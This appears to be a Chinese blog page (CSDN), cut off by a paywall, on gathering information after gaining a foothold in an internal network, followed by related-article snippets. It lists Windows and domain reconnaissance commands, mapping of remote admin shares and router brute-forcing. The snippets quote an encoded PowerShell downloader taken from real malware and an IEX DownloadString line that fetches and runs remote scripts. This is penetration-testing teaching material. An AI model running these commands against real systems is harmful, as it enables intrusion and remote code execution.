内网渗透之收集信息

最新推荐文章于 2024-05-09 00:48:13 发布
VIP文章 最新推荐文章于 2024-05-09 00:48:13 发布
阅读量2.5k 收藏
点赞数
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46440903/article/details/124307690
版权

信息收集

首先看拿到的是PC还是服务器

当前的机器角色:web服务器、公共服务器 、代理服务器、DNS服务器等

对机器所处的网路环境分析:绘制出内网的大致网络拓扑结构

对机器所在的区域进行分析:DMZ区域、办公区域、核心区域等

本机信息收集
  • 查找内网的网段
1、用工具扫网段(s.exe-->基于tcp或syn)
2、文件共享链接记录(ftp链接、mstsc3389链接记录)
3.抓包分析网络流量(分析流量看网段)、meterpreter抓取流量
4、爆破路由器
  • 网络配置信息
ipconfig  /all
tasklist --看进程
netstat -ano --查看连接
systeminfo --查看补丁及本机信息
net share --查看共享列表
at/schtasks --计划任务
wmic share get name,path,status 查找共享列表= net share 
net use K: \\192.168.2.2\c$ 磁盘映射--445端口
arp -a ARP连接
route print 路由表
netstat -ano | findstr "ESTAB" 查看本机建立的tcp连接
http://www.fuzzysecurity.com/scripts/files/wmic_info.rar--自动化脚本收集信息
域环境信息收集
whoami 查看当前的权限
net user /domain 查询域用户
net time /domain 查看用户SID
  扫描域内基础信息
S扫描器 --s.exe 
net group "domain admi
最低0.47元/天 解锁文章
理想三旬为凡尘
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透之—内网存活网段探测脚本
afei001
12-02 1426
目录 1.前言 2.内网存活网段探测脚本 for Windows 3.内网存活网段探测脚本 for Linux 1.前言 当拿下内网某台主机之后,可使用以下脚本对该内网主机网段进行盲打探测。如果是对较大内网进行渗透测试的话,这个脚本会很有帮助。判断了存活网段,就等于缩小了范围,接下来就能对该网段内的存活主机进行探测了。存活主机发现的越多,意味着掌握的信息量也就越大,发现漏洞和敏感资产的可能性也越大,有利于对目标进行全方位的渗透测试。 谁掌握的信息量越多,...
内网渗透测试之信息收集.pdf
03-17
内网渗透测试之信息收集.pdf
记一次四层内网攻防渗透测试大实验
2301_76786857的博客
08-09 416
先使用常见的 ICMP 协议查看目标,目标网站的IP为192.168.1.129ping 192.168.1.129 # 探测目标主机 然后直接对目标IP进行端口扫描:nmap -T4 -sC -sV -p 1-10000 192.168.1.129如上图,目标开启了22、80、81和6379端口。 对目标192.168.1.129进行目录爆破:python3 dirsearch.py -u "http://192.168.1.129" -e *拼接url:http://192.168.1.129/mana
渗透测试综合实验(迂回渗透,入侵企业内网并将其控制为僵尸网络
yyj1781572的博客
04-06 1540
内网渗透测试
内网渗透信息收集总结
Yu3511606536的博客
03-03 716
内网渗透信息收集总结
安全学习】记一次内网环境渗透
kali_Ma的博客
11-21 2112
通过上述过程,我们对比如GPP,约束委派,SQLServer提权有了新的认知或者理解,网络安全的学习离不开实际操作,想要搞明白漏洞更是要实际去复现学习。
红队靶场内网渗透(从DMZ主机渗透到域内机器)
m0_65712192的博客
02-12 3107
红队靶场内网渗透(从DMZ主机渗透到域内机器)
内网渗透之——网络信息收集(内网区域其他主机的信息收集、端口扫描、以及域里的一些常用命令)
wsnbbz的博客
03-25 3381
端口扫描内网环境 nmap是一个跨平台的信息收集工具,基于命令行,当然也有图形化界面,znmap,当进入内网后,操作与外网扫描基本一致,只是把对一个ip改为对一系列的ip地址段进行扫描 namp 1.直接上传nmap到目标机 1.1扫描内网有多少主机在线 nmap.exe -sP 内网地址段或单个ip 内网地址段:192.168.x.x 172.16.x.x -172....
Powershell在内网渗透中的利用
纸房子
09-13 3584
Powershell作为CMD的增强版,因为其可以直接调用.Net及COM对象而实现许多CMD无法实现的功能,所以在Windows在使用Powershell成为了更多人的首选,同时也吸引了黑客,各种花式调用在内网渗透中。借鉴网上各种资料,记录总结一下。
渗透测试 _ 内网信息收集1
08-03
前言在内网渗透测试中,信息收集的深度与广度,直接关系到整个内网渗透测试的成败,本篇文章主要对内网信息收集做简单介绍~一、内网信息描述当渗透测试人员进入内网后,面
inlinux:内网渗透信息收集脚本
05-09
inlinux 内网渗透信息收集脚本
fscan内网渗透神器
09-21
(1)信息搜集: 存活探测(icmp) 端口扫描 (2)爆破功能: 各类服务爆破(ssh、smb、rdp等) 数据库密码爆破(mysql、mssql、redis、psql、oracle等) (3)系统信息、漏洞扫描: netbios探测、域控识别 获取目标...
内网渗透信息收集笔记以及内网收集工具介绍
04-12
内网渗透信息收集笔记以及内网收集工具介绍
还原永恒之蓝下载器PS脚本混淆
Sven的忘却日记
04-26 5634
注意:以下代码为真实永恒之蓝木马下载器恶意ps代码,请不要在真实机运行、测试以及调试!!! 下面代码取自了该病毒设置的计划任务 powershell.exe -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAG...
powershell IEX
qq_28808697的博客
11-12 5851
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); 该命令将#{remote_script}加载到内存,并没有把该脚本下载到本地。
内网渗透】找到内网关键节点
分享博主日常学习和使用的一些技术
05-23 694
网络拓扑 无论通过哪种方式,把网络拓扑弄清楚 路由器和网关 dns服务器 发现内网的dns服务器很重要 ipconfig getpacket en0|grep domain 其他关键机器跳板机 分类: 宿主机 云服务器 虚拟机 ...
浅谈内网渗透
若谷的博客
01-16 9197
内网穿透即NAT穿透,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题。通过映射端口,让外网的电脑找到处于内网的电脑。拿到企业或者公司的内网权限,然后从内网得到最有价...
内网渗透篇-信息收集
Azjj
04-14 4724
内网渗透命令大全,内网信息收集
Rust - TCP Server
最新发布
Ez Lake
05-09 615
内容来自:软件工艺师 - Rust Web 全栈开发教程【完结】修改文件 tcpserver – src –修改文件 tcpclient – src –伊织 2024-05-09(四)凌晨。删掉原来的内容,配置。
python内网渗透
10-24
Python内网渗透是指利用Python编写的工具和脚本,通过漏洞利用、端口扫描、密码爆破等方式,获取内网中的敏感信息或者控制内网主机的过程。常用的Python内网渗透工具有reGeorgSocksProxy、ABPTTS等。其中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值